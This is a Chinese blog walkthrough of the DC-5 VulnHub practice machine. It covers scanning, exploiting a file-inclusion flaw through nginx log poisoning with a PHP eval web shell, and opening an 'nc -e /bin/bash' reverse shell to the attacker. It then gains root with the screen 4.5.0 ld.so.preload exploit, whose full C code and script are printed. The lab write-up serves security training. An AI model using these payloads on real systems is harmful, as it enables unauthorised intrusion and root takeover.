DC-5入门练习

最新推荐文章于 2022-09-26 12:05:39 发布
最新推荐文章于 2022-09-26 12:05:39 发布
阅读量546 收藏
点赞数 2
分类专栏: DC DC-5靶机渗透 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_helloword/article/details/107447695
版权

DC-5靶机渗透

1. 信息收集

1.查看dc-5主机mac地址
在这里插入图片描述
注意:这里最好把dc5虚拟机做一个克隆,后面需要恢复快照.
2. nmap扫描

nmap -sP 192.168.1.0/24  -oN nmap.sP
nmap -A 192.168.1.6 -p 0-6635 -oN nmap.A

发现目标靶机地址为192.168.1.6
在这里插入图片描述
查看目标主机开放那些端口
在这里插入图片描述
由于开发80我们登录随便看一看
这些网站页面都放在根目录下,我们可以用御剑扫描后台,发现最后一个页面这里可以提交表单,参数(都显示在url里)
在这里插入图片描述

在这里插入图片描述
发现每次刷新网页下面都会变化
在这里插入图片描述

2.御剑扫描
在这里插入图片描述
打开这个网页进行查看

在这里插入图片描述
刷新查看变成2017

在这里插入图片描述
思考:之前thankyou那个页面每次刷新也都变化,说明thankyou那个网页包含footer.php说明存在文件包含但是不知道是不是存在动态包含漏洞
3.检测是否存在文件包含漏洞
我们用bp抓包,爆破可能存在动态包含的变量名
在这里插入图片描述
发现爆破结果都一样
在这里插入图片描述
这里我们改变一下动态包含的文件为/etc/passwd再次爆破
发现存在动态包含,而且变量名为file
我们可以利用文件包含漏洞去包含任意文件无视文件扩展名,,如果文件中有php代码,无条件执行
在这里插入图片描述
注意:这里主要是想给大家提供一种思路,变量字典自己手工弄的,没有强大的字典

上传木马

这里我们想到上传一个木马,但是无法上传,
思考:这里是否可以利用文件包含漏洞上传到本地文件
可以通过在系统日志中写入代码,在通过文件文件包含系统日志文件去执行日志中的相关php 代码

这里是nginx服务器,日志在:

/var/log/nginx/access.log

1.然后抓包写入一句话木马
注 :在写入快照前最好恢复快照因为经过爆破日志很多,连接蚁剑时不稳定。
在这里插入图片描述

一句话木马:

<?php @eval($_REQUEST[666])?>

查看写入木马:
在这里插入图片描述
2.蚁剑连接
在这里插入图片描述
3.新建木马
注:为啥新建木马文件,因为我们当前的一句话在日志文件下,日志文件变化快对操作有影响,可能出现连接不稳定无法连接的时候,所以要进行重新连接。(和还原快照一样)

在这里插入图片描述
新建404.html一句话木马

在这里插入图片描述
重新蚁剑连接:
在这里插入图片描述
进入终端
查看当前用户,以及根下root文件,无权,下一步反弹shell提权
在这里插入图片描述

反弹shell

nc -e /bin/bash 192.168.1.16 1234

在这里插入图片描述

nc -lvvp 1234                                     //监听

python -c 'import pty;pty.spawn("/bin/bash")'   //进入交互模式

在这里插入图片描述

提权

1.查看哪些命令具有root权限且没有密码

sudo -l
**```
2.有没有一些具有suid权限的命令**
发现有一个screen-4.5.0具有root权限,下一步查找这个软件是否有漏洞

```bash
find / -perm -4000 2>/dev/null

在这里插入图片描述
3.查找漏洞
找到41154.sh后,把个脚本拷贝到当前目录下
在这里插入图片描述
kali下开启http服务

python -m SimpleHTTPServer

在这里插入图片描述
打开终端下载脚本
在这里插入图片描述
给41154.sh执行权限,并运行

在这里插入图片描述
发现运行错误,我们查看脚本,我们尝试本地编译其内的两个c语言程序
4将该脚本拆分成3部分
具体内容如下:
1)编译libhac.c

#include <stdio.h>
 
#include <sys/types.h>
 
#include <unistd.h>
 
__attribute__ ((__constructor__))
 
void dropshell(void){
 
    chown("/tmp/rootshell", 0, 0);
 
    chmod("/tmp/rootshell", 04755);
 
    unlink("/etc/ld.so.preload");
 
    printf("[+] done!\n");
 
}

编译生成libhax.so

gcc -fPIC -shared -ldl -o libhax.so libhax.c

2)编译rootshell.c

#include <stdio.h>
 
int main(void){
 
    setuid(0);
 
    setgid(0);
 
    seteuid(0);
 
    setegid(0);
 
    execvp("/bin/sh", NULL, NULL);
 
}

编译生成shellroot

gcc -o rootshell rootshell.c

3)编译run.sh

#!/bin/bash
# screenroot.sh
 
# setuid screen v4.5.0 local root exploit
 
# abuses ld.so.preload overwriting to get root.
 
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
 
# HACK THE PLANET
 
# ~ infodox (25/1/2017)
 
echo "[+] Now we create our /etc/ld.so.preload file..."
 
cd /etc
 
umask 000 # because
 
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
 
echo "[+] Triggering..."
 
screen -ls # screen itself is setuid, so...
 
/tmp/rootshell

kali开启http服务

python -m SimpleHTTPServer

5.靶机/tmp 目录下远程下载

wget http://192.168.1.12:8000/rootshell

wget http://192.168.1.12:8000/libhax.so

wget http://192.168.1.12:8000/run.sh

在这里插入图片描述
然后给下载的文件执行权限:

chmod 777 libhax.so
chmod 777 rootshell
chmod 777 run.sh

6.最后在tmp目录下运行run.sh
在这里插入图片描述

DC靶机系列入门详解,关注查看下一篇

Mr H
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dsc-seaborn-lab-dc-ds-021720
03-29
在本实验中,我们将使用第二个更高级的可视化库Seaborn进行一些练习。 目标 你将能够: 使用Seaborn的预建功能构建地块 入门 在本实验中,我们将探索可以使用Seaborn创建的几种不同类型的可视化。 Seaborn建立在...
DC-5靶机渗透测试
藤宫博也的博客
03-14 1017
DC-5
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5232
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 5833
DC-5靶机渗透测试详细教程
DC-5 靶机实战
PigLL的博客
08-22 667
DC-5 靶机实战 实验环境: 靶机:DC-5 攻击机:kali 使kali和DC-5在同一网段,都在NAT模式下 1.信息收集: 首先确定kali的IP 扫描同网段存活的主机 因为kali的IP为192.168.137.136 所以确定DC-5靶机的IP为192.168.137.143 对DC-5进行端口扫描 ...
靶机6 DC-5(过程超详细)
honest_gg的博客
09-26 741
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
css-essentials-css-issue-bot-9000-dc-web-120919
02-27
让我们练习使用W3CCSS验证器! 入门 将此课程分叉并克隆到您的本地环境中。 导航到终端中的目录,然后运行code . 在Visual Studio Code中打开文件。 最后,运行bundle安装实验室的依赖项。 继续运行rspec ,以查看...
华为HCIE-DC培训视频汇总集【共40集】.rar
09-09
HCIE-DC-34-华为TRILL部署模型及eNSP练习 HCIE-DC-35-华为VXLAN技术入门 HCIE-DC-36-华为VXLAN技术细节 HCIE-DC-37-华为VXLAN部署模型-网关选择 HCIE-DC-38-华为VXLAN部署模型-集中式网关配置案例 HCIE-DC-39-...
intro-curriculum-4004:入门コースの4章4节の练习(ISC许可证)
02-24
损害计算ジのモジュールでは,ダメージ计算...使い方var dc = require ( '.' ) ;console . log ( dc . effectiveDamage ( 100 , 50 , 30 ) ) ;以上を実行すると, 83と表示されます。以上の例では,ダメージは100,防御
adobe-pdf-embed-tutorial-node
04-08
练习代码中,导航到resources / js / dc-config.js。 这被加载在exercise / index.html头的头中。 将clientId变量设置为您先前创建的Client ID。 获取文档 您可以访问PDF Embed API的文档( )。 练习1:将PDF ...
DC系列(5)DC-5靶机渗透
Nikris的博客
01-12 925
DC-5
靶机渗透测试实战——DC-5
weixin_45116657的博客
10-30 6568
实验环境: 目标机DC-5的IP地址:未知(192.168.85.144) 攻击机kali的IP地址:192.168.85.139 实验步骤: 1、主机扫描,确定目标主机 命令:arp-scan -l 2、端口扫描,确定详细服务 命令1:nmap -sS -Pn -A -p- 192.168.85.144 命令2:nmap -sV -p- 192.168.85.144 #-sV —— 用来扫...
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4800
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
[网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-23 1390
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC-3 步骤
底层社会中的弱智
09-18 1205
确认局域网中目标主机IP 确认目标开启的端口 确认IP为192.168.0.113 端口信息为:80端口 信息收集: 看得出使用joomla框架 针对性扫描 joomscan 确认版本号以及后台登陆页面,查到公开漏洞信息 存在注入,使用sqlmap进行注入先看看是否可以直接获取osshell以及sqlshell 卒 只能一步一步来 数据库 joomladb 表:#_users 选中username和password 查看密码 尝试使用john.
DC-4入门练习
Mr_helloword的博客
07-17 1899
DC-4靶机渗透
hadoop cdh5单机安装
zwf1732289600的专栏
03-21 2747
1,安装jdk     解压:tar -zvxf jdk-7u51-linux-x64.gz     配置环境变量:vi /etc/profile             添加: JAVA_HOME=/opt/beh/jdk1.7.0_51                         PATH=$PATH:$JAVA_HOME/bin     重新加载环境变量:source /etc
Hadoop-2.2.0集群安装配置实践
stefshawn的专栏
02-22 910
Hadoop 2.x和1.x已经大不相同了,应该说对于存储计算都更加通用了。Hadoop 2.x实现了用来管理集群资源的YARN框架,可以面向任何需要使用基于HDFS存储来计算的需要,当然MapReduce现在已经作为外围的插件式的计算框架,你可以根据需要开发或者选择合适的计算框架。目前,貌似对MapReduce支持还是比较好的,毕竟MapReduce框架已经还算成熟。其他一些基于YARN框架的接
bzoj 1050 并查集
热门推荐
guoshiyuan484的博客
05-01 1万+
#include #include #include using namespace std; struct edgee { int from, to ; double value; }edge[5001]; bool com(edgee a, edgee b) { return a.value < b.value; } int fa[501]; int n, m,s,t; int real
dc-dc仿真电路 multisim
最新发布
10-31
DC-DC仿真电路在Multisim软件中是一种用于模拟和调试DC-DC转换器的工具。它可以帮助工程师在设计和优化DC-DC转换器时进行电路仿真和性能分析。 首先,我们可以在Multisim中选择合适的电路元件来构建DC-DC转换器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值